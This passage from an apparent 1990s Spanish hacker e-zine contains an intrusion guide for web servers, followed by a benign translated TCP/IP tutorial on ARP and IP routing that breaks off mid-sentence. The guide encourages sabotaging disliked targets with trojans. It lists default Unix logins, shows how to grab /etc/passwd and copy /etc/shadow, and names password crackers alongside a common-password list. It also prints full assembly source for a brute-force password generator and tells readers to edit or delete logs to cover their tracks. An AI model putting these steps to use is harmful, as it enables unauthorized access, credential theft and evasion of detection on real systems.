CYPHERPUNKS son de un volumen como de 8 mensajes por dia asi que asegurate
de cancelar tu subscripcion si vas a estar ausente por un periodo de tiempo
mandando un mensaje a la misma direccion con el siguiente mensaje:

unsubscribe cypherpunks {direccion de correo electronico}


9. Newsgroups (Grupos de Noticias)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Los grupos de noticias son algo parecidas a las listas de correo en la
interaccion de los usuarios. Mensajes son puestos en el servidor y se
requiere un software especial para poderlos visualizar; solamente podremos
usar los newsgroups si se cuenta con este servicio proporcionado por su
proveedor de servicio de internet (ISP). Si se cuenta con este servicio
necesitaras un programa como Free Agent disponible en la siguiente URL:

Free Agent
www.forteinc.com/agent/freagent.htm

10. Keep on Hacking
~~~~~~~~~~~~~~~~~~~~
Que les parecio esta guia? espero les guste y la sepan apreciar. Si crees
que puedes hacer algo mejor envialo inmediatemente a esta revista para su
publicacion. Sin envias informacion seras a¤adido automaticamente a el
grupo de colaboradores (!)RareDudes(!) y podras recibir software, e
informacion disponible unicamente para los RareDudes.

Le PompeItor

0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=

Le PomPaItor Presenta *LA GUIA* para

HACKEREAR
WEBSITES & HOMEPAGES
^^^^^^^^^^^^^^^^^^^^^
"Lo espantoso no es la altura, sino la pendiente.
La pendiente donde la mirada se precipita a lo hondo y la mano
se extiende hacia la cumbre. Alli es donde se apodera del corazon
el vertigo de su doble voluntad." -Federico Nietzsche

1. Introduccion
^^^^^^^^^^^^^^^
Si alguna vez has hechado a volar tu imaginacion se te habra ocurrido que
seria comico remover algunas graficas de algun website, o mejor aun borrar
toda la pagina de algun enemigo para deleitarte con tu venganza. Pues bien,
este es el manual que te ayudara a lograrlo.
Primero deberas entender que andar por ahi borrando paginas es *TONTO* e
inmaduro. Lo que trato de hacer es que sientas la adrenalina de entrar a un
sistema al que no estes autorizado y echar una ojeada alrededor. Si te
dedicas a invadir sistemas y borrar archivos le quitaras el privilegio a
otra persona de entrar a ese sistema ya que el operador se dara cuenta de la
intrusion y aumentaran la seguridad negando asi la entrada a mas 'intrusos'.
Si el sistema al que entraste pertenece a unos hijos de la chingada (Plantas
Nucleares, Creadores de abrigos de piel, Agencias de Gobierno,etc) olvida lo
antes dicho y haz que se arrepientan de haberse conectado a la red causando
kaos o mejor aun, infectandolos con algun buen virus (por que no reemplazar
un ejecutable por un caballo de troya?). En fin, usa tu cabeza y cuida de no
ser sorprendido en tus viajes de kAoS.

2. Websites
~~~~~~~~~~~
Un website es solamente una computadora llamada servidor por su capacidad de
de realizar diferentes tareas al mismo tiempo, ejecutando un sistema
operativo que generalmente sera UNIX o algunas de sus variaciones y con toda
la informacion guardada en algun medio.

2.1 Ganando acceso a un servidor WWW
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Aqui reside la magia del Hacker, la proteccion comun son dos preguntas Login
y Password. El usuario que tenga una cuenta en ese servidor tiene un nombre
de usuario (Login) y contrase¤a (Password) por lo que la entrada a ese
servidor no tiene problemas; pero para una persona ajena a ese servidor la
entrada es un poco mas complicada.
Para poder penetrar el sistema necesitamos saber su URL y una vez conectados
con el explorador prestar atencion al mensaje waiting reply from 103.38.28
o algo parecido que haga aparecer una direccion IP en lugar de el nombre de
dominio.
Si lograste conseguir la direccion IP usa telnet para conectarte a esa
direccion. Si cuando tratas de conectarte aparece el mensaje 'connection
refused' probablemente este protegida esa direccion con una FIREWALL. Si
este es el caso trata de hacer telnet a el nombre de dominio con la finalidad
de llegar a el frustrante LOGIN/PASSWORD.
Para entrar necesitas conseguir alguna cuenta haciendo algo de ingenieria
social o intenta con los defaults.


* CUENTAS DEFAULTS DE UNIX *

Login: Password:

root root
root system
sys sys
sys system
daemon daemon
uucp uucp
tty tty
test test
unix unix
unix test
bin bin
adm adm
adm admin
admin adm
admin admin
sysman sysman
sysman sys
sysman system
sysadmin sysadmin
sysadmin sys
sysadmin system
sysadmin admin
sysadmin adm
who who
learn learn
uuhost uuhost
guest guest
host host
nuucp nuucp
rje rje
games games
games player
sysop sysop
root sysop
demo demo


Si fracasas al intentar el acceso usando cada uno de los anteriores logins,
probablemente tengas que conseguir el password de otra manera como relaciones
humanas; esto significa que vas a tener que conseguir la clave valiendote de
trucos como hablar por telefono a una persona que sepas que esta registrada
en ese servidor y pedirle su Login y Password diciendo que necesitas validar
su cuenta o algo parecido. Otra manera de conseguir un Password es crear un
programa que robe las claves de acceso del disco duro de una persona.

3. Cuando se esta adentro
~~~~~~~~~~~~~~~~~~~~~~~~~
Una vez que hayas logrado entrar a un sistema necesitaras localizar y obtener
el archivo passwd disponible en el directorio /etc

Para obtener el archivo PASSWD usa el siguiente ejemplo:
($ simboliza el prompt UNIX)

$ ftp
FTP> get /etc/passwd
FTP> quit

Para ver el contenido de el archivo usa el siguiente comando:

$ cat /etc/passwd

Una vez que tengas en tu posesion el archivo PASSWD editalo y fijate en su
contenido, debera tener la siguiente informacion:

usuario:contrase¤a:ID:Grupo:descripcion/nombre:directorio:shell

usuario - Este es el login de algun usuario.
contrase¤a - Es el password de el usuario (encriptada con DES)
ID - Es la identificacion de ese usuario.
grupo - El grupo al que pertenece esta cuenta.
descripcion- El nombre del usuario.
directorio - El directorio de acceso de el usuario.
shell - El shell que procesa los comandos de ese usuario.

Un ejemplo podria ser:

john:234abc56:9999:13:John Johnson:/home/dir/john:/bin/john

Nombre de usuario: john
Password encriptado: 234abc56
Usuario numero: 9999
Numero de grupo: 13
Descripcion: John Johnson
Directorio de acceso: /home/dir/john
Shell: /bin/john

Si el archivo que conseguiste contiene la misma informacion pero en el campo
del password tiene un asterisco (*) o cualquier otro caracter, significa que
las contrase¤as se encuentran 'sombreadas'.
Si las contrase¤as se encuentra sombreada,las podras encontrar en el archivo
shadow aunque generalmente no se puede tener acceso a ese archivo a menos de
tener root. Una forma de conseguir SHADOW es usando el comando cp para
copiarlo a otro archivo y despues tratar de obtener el archivo al que se
copio, ejemplo:

$cp /etc/shadow /usuarios/carlos/hack.txt
$ftp
FTP> get /usuarios/carlos/hack.txt
FTP> quit
$rd /usuarios/carlos/hack.txt

Algunas otras maneras de obtener el archivo SHADOW seran explicadas en otros
numeros de RareGaZz.

Ya tengo los passwords encriptados, ahora que?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Los passwords estan encriptados usando one-way encription, significa que no
se pueden des-encriptar. Lo que Unix hace es obtener la contrase¤a del
usuario,la encripta y la compara con la que ya esta encriptada, si coinciden
entonces se le permite el acceso.

Para poder obtener las contrase¤as es necesario tener un archivo con palabras
y usar un programa para que encripte las palabras del archivo y las compare
con las contrase¤as encriptadas,si coinciden te avisa que palabra fue la que
coincidio con la contrase¤a encriptada.
Algunos programas de este tipo son:

Nombre Palabras por Segundo Computadora

John the Ripper 5077 586
Starcracker 1300 586
Cracker Jack 1008 586
KillerCracker 350 586

Estos programas se encuentran disponibles en cualquier pagina de Hackers, si
quieres la ultima version de StarCracker visita la siguiente URL:
http://www.geocities.com/SiliconValley/park/8403/index.html

Para conseguir listas de palabras haz FTP a el siguiente servidor:
warwick.ac.uk
directorio: /pub/cud

Algunas de las palabras mas usadas en contrase¤as son:

aaa academia ada adrian
aerobics airplane albany albatros
albert alex alexander algebra
alias alisa alpha alphabet
ama amy analog anchor
andy andrea animal answer
anything arrow arthur ass
asshole athena atmosphere bacchus
badass bailey banana bandit
banks bass batman beautiful
beauty beaver daniel danny
dave deb debbie deborah
december desire desperate develop
diet digital discovery disney
dog drought duncan easy
eatme edges edwin egghead
eileen einstein elephant elizabeth
ellen emerald engine engineer
enterprise enzyme euclid evelyn
extension fairway felicia fender
finite format god hello
idiot jester john johnny
joseph joshua judith juggle
julia kathleen kermit kernel
knight lambda larry lazarus
lee leroy lewis light
lisa louis love lynne
mac macintosh mack maggot
martin marty marvin matt
master maurice maximum merlin
mets michael michelle mike
minimum nicki nicole rascal
really rebecca remote rick
reagan robot robotics rolex
ronald rose rosebud rosemary
roses ruben rules ruth
sal saxon scheme scott
secret sensor serenity sex
shark sharon shit shiva
shuttle simon simple singer
single singing smile smooch
smother snatch snoopy soap
socrates spit spring subway
success summer super support
surfer suzanne tangerine tape
target taylor telephone temptation
tiger tigger toggle tomato
toyota trivial unhappy unicorn
unknown urchin utility vicki
virginia warren water weenie
whatnot whitney will virgin
william winston willie wizard
wonbat yosemite zap whatnow

Obtuve algunas cuentas, ahora?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Para poder hacer y deshacer en el servidor necesitas el password de la
cuenta root. Si despues de intentar con algunas listas de palabras no puedes
necesitaras hacer un ataque en bruto, es decir empezar desde la letra A
hasta la palabra zzzzzzzz
El siguiente programa necesita ser compilado usando TASM y es una lista de
palabras TSR que no ocupa espacio en disco y puede ser modificada, es ideal
para ataques brutos a la cuenta r00t (Programa Copiado de Phrack 47)

P A S S W O R D E N G I N E (for IBM PC's) by Uncle Armpit
+++++++++++++++++++++++++++++++++++++++++++++

Que tan practico es?
--------------------
Este programa no necesita mucho espacio en disco y puede crear listas de
palabras de gran tama¤o.

Con el ejemplo proporcionado, passwords empezando en 'aaaaaaa' y terminando en
'zzzzzzz' seran generados.

Como empiezo a usar esta lista de palabras?
-------------------------------------------

Compila el codigo y nombralo "hackdrv.sys", despues necesitas configurarlo
a¤adiendo la siguiente linea en CONFIG.SYS

device=c:\hackdrv.sys

Una vez en memoria el programa creara la lista de variables en memoria llamada
HACKPWD. Cualquier programa que uses (excepto StarCracker) debera reconocer
hackpwd como una lista de palabras y empezar a crackear.
Si deseas reiniciar una sesion desde una combinacion especifica solo modifica
el archivo HACKDRV.SYS con un editor HEXADECIMAL y modifica la cadena de
caracteres con los que empieza ;-0

;-----------------------cut here--------------------------------
;Program HACKDRV.SYS
;
org 0h
next_dev dd -1
attribute dw 0c000h ;character device w/ ioctl calls
strategy dw dev_strategy
interrupt dw dev_int
dev_name db 'HACKPWD '
countr dw offset number
number db 'aaaaaa',0ah ;<---- 6 caracteres en minusculas (empiezo)
numsize equ $-number - 2
afternum:

;working space for device driver
rh_ofs dw ?
rh_seg dw ?

dev_strategy: ;strategy routine
mov cs:rh_seg,es
mov cs:rh_ofs,bx
retf

dev_int: ;interrupt routine
pushf
push ds
push es
push ax
push bx
push cx
push dx
push di
push si

cld
push cs
pop ds

mov bx,cs:rh_seg
mov es,bx
mov bx,cs:rh_ofs

mov al,es:[bx]+2
rol al,1
mov di,offset cmdtab
xor ah,ah
add di,ax
jmp word ptr[di]


cmdtab: ;command table
dw init ;0
dw exit3 ;1
dw exit3 ;2
dw ioctl_read ;3
dw do_read ;4
dw exit3 ;5
dw exit3 ;6
dw exit3 ;7
dw exit3 ;8
dw exit3 ;9
dw exit3 ;10
dw exit3 ;11
dw ioctl_write ;12
dw exit3 ;13
dw 5 dup (offset exit3)



ioctl_read:
push es
push bx

mov si,es:[bx+10h]
mov di,es:[bx+0eh]
mov es,si

push cs
pop ds
mov si,offset number
xor cx,cx

get_char:
lodsb
stosb
inc cl
cmp al,0ah
jz ioctl_rend
jmp get_char

ioctl_rend:
pop bx
pop es
mov es:[bx+012h],cx
mov cs:countr,offset number
jmp exit2

ioctl_write:
push es
push bx
mov si,es:[bx+010h]
mov ds,si
mov si,es:[bx+0eh]
mov cx,numsize+1 ;es:[bx+012h]
push cs
pop es
mov di,offset number
repe movsb
pop es
pop bx
mov cs:countr,offset number
jmp exit2


do_read:
push es
push bx


push cs
pop ds

mov si,[countr]
inc si ;word ptr [countr]
cmp si,offset afternum
jnz is_okay
mov si,offset number
call inc_num


is_okay:
mov [countr],si
mov di,es:[bx]+0eh
mov ax,es:[bx]+010h
mov cx, es:[bx]+012h
jcxz clean_up
mov es,ax
repe movsb

clean_up:
pop bx
pop es
jmp exit2


exit3: mov es:word ptr 3[bx],08103h
jmp exit1

exit2:
mov es:word ptr 3[bx],0100h

exit1:
pop si
pop di
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
popf
retf
exit:

inc_num proc near
push si
mov si,numsize

reiterate:
inc byte ptr [number+si]
cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range
jnz _exit
mov byte ptr [number+si],'a' ;starting char. in range
dec si
cmp si,-1
jnz reiterate
mov byte ptr [number],01ah ;send EOF
_exit:
pop si
ret
inc_num endp



at_eof: ; the non-resident code starts here

initial proc near
push es

push cs
pop ds

push cs
pop es

mov si,offset number
mov di,offset tmpnum
cld
_again:
lodsb
cmp al,0ah
jz _nomorechars
stosb
jmp _again

_nomorechars:
mov si,offset msgend
mov cx,4
repe movsb

mov ah,09 ;print welcome message
mov dx,offset msg1
int 21h

pop es
ret
initial endp

init: call initial
mov ax,offset at_eof
mov es:[bx]+0eh,ax
push cs
pop ax
mov es:[bx]+010h,ax
mov cs:word ptr cmdtab,offset exit3
jmp exit2


msg1 db "Incremental Password Generator (c)1995",0ah,0dh
db "Written by Uncle Armpit",0ah,0dh,0ah,0dh
db "Starting at word ["
tmpnum db 10 dup (?)
msgend db "]",0a,0d,'$'
;END hackdrv.sys
----------------------------------cut here----------------------------------

Como limpiar tus huellas
~~~~~~~~~~~~~~~~~~~~~~~~
Si deseas que tu ingreso con la cuenta r00t no quede registrado en los LOGS
de el servidor revisa los directorios buscando archivos como logs, syslog,
log, o cualquiera que parezca que guarda un reporte de los accesos y
borralos o mejor aun editalos usando el editor de archivos de UNIX. Para
ejecutar el editor usa el comando vi

Edita o borra los siguientes archivos: /etc/syslog
/etc/log
/etc/logs

Existen algunos scripts para borrar las huellas como ZAP! disponibles en la
red y en los proximos numeros de esta revista.
Le PompaItor
^^^^^^^^^^^^
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=


La primera parte de este tremendo articulo *<><><><><><><><><><><><*
lo encontraras en RareGaZz #1 <> TCP/IP <>
<> Tecnologia Internet <>
@ Numero 2 de 2 @ *<><><><><><><><><><><><*



4.2 Escenario tipico de translacion

Durante una operacion normal en una aplicacion de red, como TELNET, se
envia un mensaje de aplicacion a TCP, despues TCP envia el correspondiente
mensaje TCP a el modulo IP. La direccion destino IP es conocida por la
aplicacion, el modulo TCP y el modulo IP. En este punto el paquete IP ha
sido construido y esta listo para ser entregado a el controlador Ethernet,
pero primero la direccion Ethernet debe ser determinada.

La tabla ARP es usada para ver la destinacion Ethernet.

4.3 ARP SOLICITUD/RESPUESTA

La tabla ARP es completada automaticamente segun se vaya necesitando.

Cuando una tabla ARP no puede ser usada para transladar una direccion
suceden estas dos cosas:

1. Una paquete de solicitud ARP con una direccion Broadcast Ethernet -es
decir, a todos los componentes de la red- es enviado a cada computadora.

2. El paquete IP es marcado para futuro envio.

Cada computadora en la interfaz Ethernet recibe el cuadro Ethernet por ser
enviado a la direccion 'anunciada' (broadcast). Cada manejador Ethernet
examina el tipo de campo en el cuadro Ethernet y pasa el paquete ARP a el
modulo ARP. El paquete de solicitud ARP dice "Si tu direccion IP es igual
a la direccion IP destino, entonces dime tu direccion Ethernet". Un paquete
de solicitud ARP es algo asi:

------------------------------------------------
|Direccion IP Destino 223.1.2.1 |
|Direccion Ethernet Remitente 08-00-39-00-2F-C3|
------------------------------------------------
|Direccion IP Destino 223.1.2.2 |
|Direccion Ethernet Destino <blank> |
------------------------------------------------
TABLA 2. Ejemplo de una solicitud ARP

Cada modulo ARP examina su direccion IP y si la direccion IP destino
coincide con su propia direccion IP, le envia una respuesta directamente
a la direccion Ethernet fuente. El paquete ARP respuesta dice "Si, esa es
mi direccion IP, dejame darte mi direccion Ethernet".Un paquete de respuesta
ARP tiene el campo remitente/destinatario al revez que la solicitud. El
paquete se ve algo asi:

------------------------------------------------
|Direccion IP Remitente 223.1.2.2 |
|Direccion Ethernet Remitente 08-00-28-00-38-A9|
------------------------------------------------
|Direccion IP Destino 223.1.2.1 |
|Direccion Ethernet Destino 08-00-39-00-2F-C3|
------------------------------------------------
TABLA 3. Respuesta ARP

La respuesta es recibida por la computadora que lo envio originalmente.
El controlador Ethernet se fija en campo en el cuadro Ethernet y luego pasa
el paquete ARP a el modulo ARP. El modulo ARP examina el paquete ARP y
a¤ade la direccion IP remitente y destinatario a la tabla ARP.

La tabla quedaria asi:

-----------------------------------
|Direccion IP Direccion Ethernet|
-----------------------------------
|223.1.2.1 08-00-39-00-2F-C3|
|223.1.2.2 08-00-28-00-38-A9|
|223.1.2.3 08-00-5A-21-A7-22|
|223.1.2.4 08-00-10-99-AC-54|
-----------------------------------
TABLA 4. Tabla ARP despues de la respuesta

4.4 La Continuacion del Escenario

La nueva tanslacion ha sido instalada automaticamente en la tabla, solo
microsegundos despues de que se necesitaba. Como puedes recordar de el
paso 2 arriba, el paquete IP era marcado para futuro envio. Ahora, la
direccion IP era transladada a la direccion Ethernet simplemente observando
la tabla ARP y luego el cuadro Ethernet es transmitido a la Ethernet.
Asi, con los nuevos pasos 3, 4, y 5, el escenario para la computadora que
envia (remitente) es:

1. Un paquete de peticion ARP es enviado con una direccion anunciada y
es enviado a todas las computadoras de la red.

2. El paquete IP era marcado para futuro envio.

3. La respuesta ARP llega con la direccion IP-a-Ethernet para la tabla.

4. Para el paquete IP marcado para futuro envio, la tabla es usada para
transladar la direccion IP a Ethernet.

5. El cuadro Ethernet es transmitido a la Ethernet.

En breve, cuando la translacion hace falta en la tabla ARP, una paquete IP
es detenido y se espera a que responda una computadora a la solicitud
ARP. La informacion necesaria para la translacion es rapidamente completada
y el paquete IP es transmitido.

Cada computadora tiene una tabla ARP separada de cada interfaz Ethernet.
Si la computadora destino no existe, no habra ninguna respuesta ARP y la
tabla ARP no sera completada. IP descartara el paquete IP enviado a esa
direccion. Los protocolos de la parte alta de la Ethernet no pueden
diferencias entre una Ethernet rota y la falta de una computadora con la
direccion IP destino.

5. Protocolo Internet

El modulo IP es central en la tecnologia Internet y la escencia de IP es
su tabla ruteadora. IP usa su tabla en-memoria para hacer todas las
decisiones acerca de la ruta de un paquete IP. El contenido de la tabla
ruteadora es definido por el administrador de la red. Un error en esa
tabla bloquea la comunicacion.

Para entender como una tabla ruteadora es usada es necesario entender
el trabajo entre redes llamado internetworking. Este entendimiento es
necesario para la administracion y mantenimiento satisfactorio de una
red IP.

La tabla ruteadora es mejor entendida si primero se tiene una vista de
el ruteado, despues aprendiendo acerca de las direcciones IP de las
redes y por ultimo comprender los detalles.

5.1 Ruteado Directo

La figura de abajo es una internet peque¤a con 3 computadoras: A, B, y C.
Cada computadora tiene la misma escalera de protocolos TCP/IP como se ve
en la figura 1.
Cada interfaz Ethernet tiene su propia direccion Ethernet. Cada computadora
tiene su direccion IP asignada a la interfaz por el administrador de la red,
quien tambien ha asignado un numero IP a la Ethernet.

A B C
| | |
--o------o------o--
Ethernet 1
Desarrollo de una red IP

Figura 6. Una red IP

Cuando A envia un paquete IP a B, el encabezado IP contiene la direccion
IP de la computadora A y el encabezado contiene la direccion Ethernet de
A como la direccion Ethernet fuente. Tambien, el encabezado IP contiene
la direccion IP de B como la direccion destino y el encabezado Ethernet
contiene la direccion Ethernet de B como la direccion destino.

------------------------------------------
| Direccion Fuente Destino |
------------------------------------------
| Encabezado IP A B |
| Encabezado Ethernet A B |
------------------------------------------
TABLA 5. Direcciones en un cuadro Ethernet para un paquete IP
de A dirigido a B

Para este simple caso, IP esta en el punto mas alto por que IP a¤ade poco
servicio ofrecido por la Ethernet. De cualquier manera. IP a¤ade costo: El
tiempo extra de procesamiento del CPU y el ancho de banda a generar,
transmitir y crear el encabezado IP.

Cuando el modulo IP de la computadora B recibe el paquete de A, checa la
direccion IP destino con su propia direccion buscando que sean iguales,
despues pasa el datagrama los protocolos de mas alto nivel.

Esta comunicacion entre A y B usar ruteado directo.

5.2 Ruteado Indirecto

La figura de abajo es una vista mas realistica de una Internet. Esta
compuesta de 3 Ethernets y 3 direcciones IP conectadas por un ruteador
IP llamado computadora D. Cada una de las 3 redes tiene 4 computadoras;
cada computadora tiene su propia direccion Ethernet e IP.

A B C ----D---- E F G
| | | | | | | | |
--o------o------o------o- | -o------o------o------o--
Ethernet 1 | Ethernet 2
"Desarollo" de la red IP | red IP "Contabilidad"
|
|
| H I J
| | | |
--o-----o------o------o--
Ethernet 3
red IP "Fabrica"

Figura 7. Tres redes IP; una Internet.

Con excepcion de la computadora D, cada computadora tiene la 'escalera' de
protocolos igual que en la figura 1. La computadora D es el ruteador IP
y esta conectada a las 3 redes y por eso tiene 3 direcciones IP y 3
direcciones Ethernet. La computadora D tiene la 'escalera' de protocolos
similar a la figura 3, excepto que tiene 3 modulos ARP y 3 controladores
Ethernet en lugar de 2. Por favor noten que la computadora D solo tiene
un modulo IP.

El administrador de la red ha asignado un numero unico llamado 'numero IP
de red' para cada una de las Ethernets. Los numeros IP de red no son
mostrados en este diagrama, solo los nombres de red.

Cuando la computadora A envia un paquete IP a la computadora B, el proceso
es identico a el ejemplo de la red sencilla. Cualquier comunicacion entre
las computadoras localizadas en una red IP sencilla es identica a el
ejemplo de ruteado discutido previamente.

Cuando las computadoras D y A se comunican, se llama comunicacion directa.
Cuando las computadoras D y E se comunican, se llama comunicacion directa.
Cuando las computadoras D y H se comunican, se llama comunicacion directa.
Esto es por que cada uno de estos pares de computadoras estan en la misma
red IP.

De cualquier manera, cuando la computadora A se comunica con una computadora
del otro lado del ruteador IP, la comunicacion no es directa. La computadora
A debe usar D para enviar el paquete IP a la siguiente red. Esta
comunicacion se llama "indirecta".

Este ruteado de paquetes IP es hecho por los modulos IP y transcurre
transparentemente a TCP, UDP, y a las aplicaciones de red.

Si A envia un paquete IP a E, la direccion remitente IP y la direccion
remitente Ethernet son las de A. La direccion IP destino es E, pero por que
el modulo IP de A envia el paquete a D para que lo diriga, la direccion
Ethernet destino es la de D.

------------------------------------
|Direccion Remitente Destino |
------------------------------------
|IP header A E |
|Ethernet header A D |
------------------------------------
TABLA 6. Direcciones en un cuadro Ethernet de un paquete IP de A
a E (pasando por D)

El modulo IP de D recibe el paquete despues de examinar la direccion IP
destino y dice "Esta no es mi direccion IP," y envia el paquete IP
directamente a E.

--------------------------------------
|Direccion Remitente Destino |
--------------------------------------
|Encabezado IP A E |
|Encabezado Ethernet D E |
--------------------------------------
TABLA 7. Direcciones en un cuadro Ethernet para un paquete IP
de A a E (despues de D)

En sumario, para comunicacion directa, ambas direcciones remitente IP y
la direccion remitente Ethernet es la direccion de la computadora que
envia y la direccion IP destino es la de el recipiente. Para comunicacion
indirecta, la direccion IP y la direccion Ethernet no coinciden en esta
manera.

Este ejemplo de internet es muy simple.Las verdaderas redes son regularmente
complicadas por muchos factores, resultando en multiples ruteadores IP y
distintos tipos de redes fisicas. Este ejemplo de internet puede realizarse
en el caso de que el administrador de la red quisiera dividir el trafico de
la red en orden de localizar el trafico Ethernet.

5.3 Reglas para el ruteador

[Este parte ha sido suprimida por el traductor!]

5.4 Direcciones IP

El administrador de la red asigna una direccion IP a las computadoras
de acuerdo con la red IP a las que la computadora este conectada. Una parte
de la direccion de 4 bytes es la direccion IP de red, la otra parte es el
numero IP de la computadora (o numero de host). Para la computadora en la
tabla 1, con una direccion IP de 223.1.2.1, el numero de red es 223.1.2 y
el numero Host es numero 1.

La porcion de las direcciones que es usado para el numero de red y para
el numero de Host es definido por los primeros bits en la direccion de
4 bytes. Todos los ejemplos de direcciones IP en este tutorial son de
clase C, significa que los 3 primeros bits indican que 21 bits son el
numero de la red y los 8 bits son el numero Host. Esto permite 2,097,152
redes clase C con mas de 254 Host en cada red.

El espacio de la direccion IP es administrado por el NIC -Network
Information Center-. Todas las Internets que esten conectadas a la unica
Internet Mundial deben usar numeros asignados por NIC. Si tu estas
preparando tu propia Internet y no tienes planeado conectarla a la Internet
mundial, de todas maneras debes obtener el numero de tu red por via NIC.
Si tu escoges tu propio numero, corres el riesgo de confusion y caos en
el momento que se conecte a la Internet Mundial.

5.5 Nombres

La gente se refiere a las computadoras por nombres no por numeros. Una
computadora llamada Alpha puede tener la direccion IP de 223.1.2.1. Para
redes peque¤as, esta translacion de nombre a direccion es tenida en cada
computadora de el archivo "hosts". Para redes mas grandes, esta translacion
esta guardada en un servidor accesado desde la red cuando se necesite. Unas
pocas lineas de este archivo se verian asi:

223.1.2.1 alpha
223.1.2.2 beta
223.1.2.3 gamma
223.1.2.4 delta
223.1.3.2 epsilon
223.1.4.2 iota

La direccion IP es la primera columna y el nombre de la computadora es la
segunda columna.

En la mayoria de los casos, tu puedes instalar archivos "hosts" identicos
en todas las computadoras. Tu puedes darte cuenta que "Delta" tiene solo
una entrada en este archivo a pesar de tener 3 direcciones IP. Delta
puede ser alcanzada con cualquier de sus direccion IP; sin importar cual
sea usada. Cuando delta recibe un paquete IP revisa la direccion destino,
y reconocera cualesquiera de sus 3 direcciones IP.

Las redes IP tambien tienen nombres. Si tu tienes 3 redes IP, tu archivo
"networks" que documenta estos nombres se veria algo asi:

223.1.2 desarrollo
223.1.3 contadora
223.1.4 fabrica

El numero IP de la red esta en la primera columna y su nombre en la segunda.

Desde este ejemplo tu puedes ver que alpha es la computadora 1 en el
desarrollo de la red, beta es la computadora numero 2 en el desarrollo
de la red y asi. Tu tambien puedes decir que alpha es desarrollo.1,
Beta es desarrollo.2, y asi.

La lista de archivo HOST mostrada es adecuada para los usuarios, pero el
administrador de la red probablemente reemplzara la linea para delta con:

223.1.2.4 devnetrouter delta
223.1.3.1 facnetrouter
223.1.4.1 accnetrouter

Estas nuevas 3 lineas para el archivo hosts le dan a cada una de las
direcciones IP de delta un nombre con significado.

5.6 Tabla ruteadora IP

Cuando IP necesita saber que interfaz de red usar para mandar un paquete
IP se fija en la tabla ruteadora usando una llave de busqueda extraida
de la direccion IP destino.

La tabla de rutas o ruteadora contiene una columna para cada ruta. Las
columnas primarias en la tabla son: numero IP de red, bandera
directo/indirecto, direccion IP ruteadora y el numero de interfaz. Esta
tabla es usada por cada paquete IP que sale de la red.

En la mayoria de las computadoras la tabla ruteadora puede ser modificada
con la el comando "route". El contenido de la tabla de rutas es definido
por el administrador de la red por que el asigna las direccion IP a las
computadoras.

5.7 Detalles del ruteado indirecto

--------- ---------
| alpha | | beta |
| 1 | | 1 |
--------- ---------
| |
--------o---------------o-
Ethernet 1
Red IP "Desarrollo"

Figura 8. Vista cercana de una red IP

La tabla de rutas se ve asi:

----------------------------------------------------------------
| Red directo/indirecto ruteador numero de interfaz|
----------------------------------------------------------------
| Desarrollo directo <blank> 1 |
----------------------------------------------------------------
TABLA 8. Ejemplo de una simple tabla ruteadora

Esta vista puede ser observada en algunos sistemas UNIX con el comando
"netstat -r". Con esta simple red, todas las computadoras tienen tablas
ruteadoras identicas.

Para la discusion, la tabla es otra vez impresa con el nombre de red
transladado a su numero de red.
----------------------------------------------------------------
| Red directo/indirecto ruteador numero de interfaz|
----------------------------------------------------------------
|223.1.2 direct <blank> 1 |
----------------------------------------------------------------
TABLA 9. Ejemplo simple de una tabla ruteadora con numeros.

5.8 Escenario Directo

Alpha le esta enviando un paquete IP a beta. El paquete IP estan en el
modulo IP de beta y la direccion destino es beta o 223.1.2.2. IP extrae
la porcion de la red de la direccion IP y busca la primera columna buscando
que sean iguales. Con esta red el primer dato es encontrado y a¤adido en
la primera entrada.

La otra informacion en esta entrada indica que computadoras en esta red
pueden ser alcanzadas directamente a travez de la interfaz 1. Una tabla
de translacion ARP termina en la direccion beta IP y luego el cuadro
Ethernet es mandado directamente a beta via interfaz numero 1.

Si una aplicacion trata de mandar datos a una direccion IP que no esta
en el desarrollo de la red, IP no podra encontrar en la tabla de rutas
la direccion IP y el paquete es descartado. Algunas computadoras proveen
con un mensaje de error.

5.9 Detalles del Ruteado Indirecto

Ahora examinaremos mas de cerca a los complicados mecanismo de ruteo
que son usados para el escenario examinado previamente.

--------- --------- ---------
| alpha | | delta | |epsilon|
| 1 | |1 2 3| | 1 |
--------- --------- ---------
| | | | |
--------o---------------o- | -o----------------o--------
Ethernet 1 | Ethernet 2
Red IP "Desarrollo" | Red IP "Contabilidad"
|
| --------
| | iota |
| | 1 |
| --------
| |
--o--------o--------
Ethernet 3
Red IP "Fabrica"

Figura 9. Vista de cerca de las 3 redes IP

La tabla ruteadora dentro de alpha se ve asi:

----------------------------------------------------------------
| Red directo/indirecto ruteador numero de interfaz|
----------------------------------------------------------------
| Desarrollo Directo <blank> 1 |
| Contabilidad Indirecto devnetrouter 1 |
| Fabrica Indirecto devnetrouter 1 |
----------------------------------------------------------------
TABLA 10. Tabla de rutas de alpha


La tabla de rutas se ve asi con numeros en lugar de nombres:

----------------------------------------------------------------
| Red directo/indirecto ruteador numero de interfaz|
----------------------------------------------------------------
|223.1.2 directo <blank> 1 |
|223.1.3 indirecto 223.1.2.4 1 |
|223.1.4 indirecto 223.1.2.4 1 |
----------------------------------------------------------------
TABLA 11. Tabla de rutas de alpha con numeros

El ruteador en la tabla de rutas de alpha es la direccion IP de la conexion
de Delta con la red desarrollo.

5.10 Escenario Indirecto

Alpha envia un paquete IP a epsilon. El paquete IP esta en el modulo IP y
la direccion destino IP es epsilon (223.1.3.2). IP extrae la porcion de la
red de la direccion IP (223.1.3) y busca la primera columna de la tabla
